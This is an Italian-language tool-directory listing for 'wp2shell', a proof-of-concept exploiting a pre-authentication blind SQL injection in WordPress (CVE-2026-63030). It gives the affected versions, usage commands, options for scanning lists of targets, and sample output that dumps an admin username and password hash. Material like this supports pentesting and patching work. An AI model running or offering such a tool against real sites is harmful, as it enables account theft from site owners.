Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-63030 — CVE-2026-63030 (wp2shell) PoC. | Kitploit
Strumenti/GitHubGitHub/4minx/cve-2026-63030
Attacchi alle PasswordAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHub4minx/cve-2026-63030

CVE-2026-63030

CVE-2026-63030 (wp2shell) PoC.

Vedi Repository
821 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-63030: wp2shell

Exploit di SQL Injection per Desincronizzazione API Batch WordPress

Strumento Proof of Concept per estrarre utenti e hash di password tramite la vulnerabilità CVE-2026-63030 (wp2shell).


Informazioni sulla vulnerabilità

  • CVE: CVE-2026-63030 (wp2shell)
  • CVE associato: CVE-2026-60137
  • Tipo: SQL Injection Blind Pre-Autenticazione
  • Versioni affette: WordPress 6.9.0–6.9.4, 7.0.0–7.0.1
  • Risolto: 6.9.5, 7.0.2+

Utilizzo

root@kitploit:~
python POC.py <target_url> [options]

Utilizzo base

root@kitploit:~
python POC.py --rest-route http://target.com

Opzioni


Esempio di output:

root@kitploit:~
[*] Scanning: http://127.0.0.1/
[*] 1 users found
[+] ID:1 User:admin Hash:$wp$2y$10$Z6gwPduKb7wAbm0bHht1be7SxrgbyxgnbPmTVcVz9nP1KBX811xQy
[*] Requests: 553


Riferimenti

  • Analisi Penligent - CVE-2026-63030 wp2shell
  • Rapid7 Labs - CVE-2026-63030: wp2shell una vulnerabilità critica di esecuzione codice remoto in WordPress Core
  • Comunicato di sicurezza WordPress 7.0.2
Scarica lo strumento
ArgomentoDescrizionePredefinito
targetURL singolo del target-
-l, --listFile con elenco di target (uno per riga)-
--prefixPrefisso tabella databasewp_
--rest-routeUsa ?rest_route=Disabilitato
--timeoutTimeout richiesta (secondi)30
--proxyProxy HTTP (compatibile con Burp/ZAP)Nessuno
--max-lenLunghezza massima estrazione255